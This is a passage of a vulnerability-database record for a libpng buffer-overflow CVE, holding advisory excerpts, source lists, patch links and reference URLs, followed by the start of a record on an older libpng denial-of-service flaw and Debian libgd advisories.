v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8472"
},
{
"db": "VULHUB",
"id": "VHN-86433"
},
{
"db": "VULMON",
"id": "CVE-2015-8472"
},
{
"db": "PACKETSTORM",
"id": "135555"
},
{
"db": "PACKETSTORM",
"id": "135265"
},
{
"db": "PACKETSTORM",
"id": "135556"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135153"
},
{
"db": "PACKETSTORM",
"id": "134720"
},
{
"db": "PACKETSTORM",
"id": "134722"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "136346"
}
],
"trust": 1.89
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-86433",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86433"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2015-8472",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2015/12/03/6",
"trust": 1.2
},
{
"db": "MCAFEE",
"id": "SB10148",
"trust": 1.2
},
{
"db": "BID",
"id": "78624",
"trust": 1.2
},
{
"db": "CNNVD",
"id": "CNNVD-201512-189",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "135153",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "135265",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "134874",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-86433",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-8472",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135555",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135556",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135557",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134720",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134722",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137932",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "136346",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86433"
},
{
"db": "VULMON",
"id": "CVE-2015-8472"
},
{
"db": "PACKETSTORM",
"id": "135555"
},
{
"db": "PACKETSTORM",
"id": "135265"
},
{
"db": "PACKETSTORM",
"id": "135556"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135153"
},
{
"db": "PACKETSTORM",
"id": "134720"
},
{
"db": "PACKETSTORM",
"id": "134722"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "136346"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
},
{
"db": "NVD",
"id": "CVE-2015-8472"
}
]
},
"id": "VAR-201601-0495",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-86433"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:17:04.787000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libpng Buffer Overflow Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59039"
},
{
"title": "Red Hat: Moderate: libpng security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20152596 - Security Advisory"
},
{
"title": "Red Hat: Moderate: libpng12 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20152595 - Security Advisory"
},
{
"title": "Red Hat: Moderate: libpng security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20152594 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: CVE-2015-8540: read underflow in libpng",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=0a130e26709c1ba00694161c08b9c604"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2861-1"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: Incomplete fix for CVE-2015-8126",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=386e683fecec564e81371b5dca873869"
},
{
"title": "Debian Security Advisories: DSA-3443-1 libpng -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=57e4bc5fc071e2986f7cef65414ffe23"
},
{
"title": "Red Hat: CVE-2015-8472",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2015-8472"
},
{
"title": "Amazon Linux AMI: ALAS-2015-615",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2015-615"
},
{
"title": "Apple: OS X El Capitan v10.11.4 and Security Update 2016-002",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ef054ba76412200e34091eb91c38c281"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM Netezza Analytics for NPS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c36fc403a4c2c6439b732d2fca738f58"
},
{
"title": "clair-lab",
"trust": 0.1,
"url": "https://github.com/sjourdan/clair-lab "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-8472"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86433"
},
{
"db": "NVD",
"id": "CVE-2015-8472"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.3,
"url": "http://www.securityfocus.com/bid/78624"
},
{
"trust": 1.3,
"url": "http://rhn.redhat.com/errata/rhsa-2015-2594.html"
},
{
"trust": 1.3,
"url": "http://rhn.redhat.com/errata/rhsa-2015-2596.html"
},
{
"trust": 1.3,
"url": "https://access.redhat.com/errata/rhsa-2016:1430"
},
{
"trust": 1.2,
"url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
},
{
"trust": 1.2,
"url": "http://sourceforge.net/projects/libpng/files/libpng10/1.0.65/"
},
{
"trust": 1.2,
"url": "http://sourceforge.net/projects/libpng/files/libpng12/1.2.55/"
},
{
"trust": 1.2,
"url": "http://sourceforge.net/projects/libpng/files/libpng14/1.4.18/"
},
{
"trust": 1.2,
"url": "http://sourceforge.net/projects/libpng/files/libpng15/1.5.25/"
},
{
"trust": 1.2,
"url": "http://sourceforge.net/projects/libpng/files/libpng16/1.6.20/"
},
{
"trust": 1.2,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
},
{
"trust": 1.2,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
},
{
"trust": 1.2,
"url": "https://support.apple.com/ht206167"
},
{
"trust": 1.2,
"url": "http://www.debian.org/security/2016/dsa-3443"
},
{
"trust": 1.2,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/174936.html"
},
{
"trust": 1.2,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175073.html"
},
{
"trust": 1.2,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/174905.html"
},
{
"trust": 1.2,
"url": "http://www.openwall.com/lists/oss-security/2015/12/03/6"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2015-2595.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0055.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0056.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0057.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00038.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00042.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00044.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00041.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00043.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00045.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00047.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00048.html"
},
{
"trust": 1.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10148"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2015-8126"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2015-8472"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-affect-ibm-netezza-analytics/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-affect-ibm-netezza-analytics-for-nps/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-jre-8-0-1-1-affect-ibm-netezza-platform-software-clients/"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8540"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-0448"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7575"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2015-7575"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-0483"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5041"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2015-7981"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-0402"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2015-5041"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7981"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-0466"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-0494"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0448"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0466"
},
{
"trust": 0.3,
"url": "http://www.ibm.com/developerworks/java/jdk/alerts/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0483"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-8540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0494"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0402"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10148"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2015:2596"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/2861-1/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=43094"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0100.html"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0475"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0098.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0475"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0099.html"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libpng/1.2.51-0ubuntu3.15.04.2"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-2861-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libpng/1.2.51-0ubuntu3.15.10.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libpng/1.2.46-3ubuntu4.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libpng/1.2.50-1ubuntu2.14.04.2"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4883"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4882"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4872"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4844"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3449"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0264"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4860"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4871"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0376"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0376"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4860"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4883"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3443"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4882"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4872"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0686"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-5006"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5006"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0687"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0264"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659"
},
{
"trust": 0.1,
"url": "https://gpgtools.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht206171"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86433"
},
{
"db": "VULMON",
"id": "CVE-2015-8472"
},
{
"db": "PACKETSTORM",
"id": "135555"
},
{
"db": "PACKETSTORM",
"id": "135265"
},
{
"db": "PACKETSTORM",
"id": "135556"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135153"
},
{
"db": "PACKETSTORM",
"id": "134720"
},
{
"db": "PACKETSTORM",
"id": "134722"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "136346"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
},
{
"db": "NVD",
"id": "CVE-2015-8472"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-86433",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2015-8472",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135555",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135265",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135556",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135557",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135153",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "134720",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "134722",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "137932",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "136346",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201512-189",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2015-8472",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2016-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-86433",
"ident": null
},
{
"date": "2016-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2015-8472",
"ident": null
},
{
"date": "2016-02-02T16:43:57",
"db": "PACKETSTORM",
"id": "135555",
"ident": null
},
{
"date": "2016-01-15T00:04:37",
"db": "PACKETSTORM",
"id": "135265",
"ident": null
},
{
"date": "2016-02-02T16:44:07",
"db": "PACKETSTORM",
"id": "135556",
"ident": null
},
{
"date": "2016-02-02T16:44:12",
"db": "PACKETSTORM",
"id": "135557",
"ident": null
},
{
"date": "2016-01-07T00:11:25",
"db": "PACKETSTORM",
"id": "135153",
"ident": null
},
{
"date": "2015-12-10T00:39:58",
"db": "PACKETSTORM",
"id": "134720",
"ident": null
},
{
"date": "2015-12-10T00:40:23",
"db": "PACKETSTORM",
"id": "134722",
"ident": null
},
{
"date": "2016-07-18T19:51:43",
"db": "PACKETSTORM",
"id": "137932",
"ident": null
},
{
"date": "2016-03-22T15:18:02",
"db": "PACKETSTORM",
"id": "136346",
"ident": null
},
{
"date": "2015-12-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-189",
"ident": null
},
{
"date": "2016-01-21T15:59:00.117000",
"db": "NVD",
"id": "CVE-2015-8472",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2017-11-04T00:00:00",
"db": "VULHUB",
"id": "VHN-86433",
"ident": null
},
{
"date": "2017-11-04T00:00:00",
"db": "VULMON",
"id": "CVE-2015-8472",
"ident": null
},
{
"date": "2021-05-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-189",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-8472",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libpng Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
}
],
"trust": 0.6
}
}
VAR-200705-0670
Vulnerability from variot - Updated: 2026-03-09 20:54The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state. Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. This issue affects libpng-0.90 through libpng-1.2.16. This BID is being retired because this issue was addressed in BID 24000 (Libpng Library Remote Denial of Service Vulnerability).
CVE-2007-3476
An array indexing error in libgd's GIF handling could induce a
denial of service (crash with heap corruption) if exceptionally
large color index values are supplied in a maliciously crafted
GIF image file.
CVE-2007-3477
The imagearc() and imagefilledarc() routines in libgd allow
an attacker in control of the parameters used to specify
the degrees of arc for those drawing functions to perform
a denial of service attack (excessive CPU consumption).
CVE-2007-3996
Multiple integer overflows exist in libgd's image resizing and
creation routines; these weaknesses allow an attacker in control
of the parameters passed to those routines to induce a crash or
execute arbitrary code with the privileges of the user running
an application or interpreter linked against libgd2.
Debian GNU/Linux 4.0 alias etch
Debian (stable)
Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
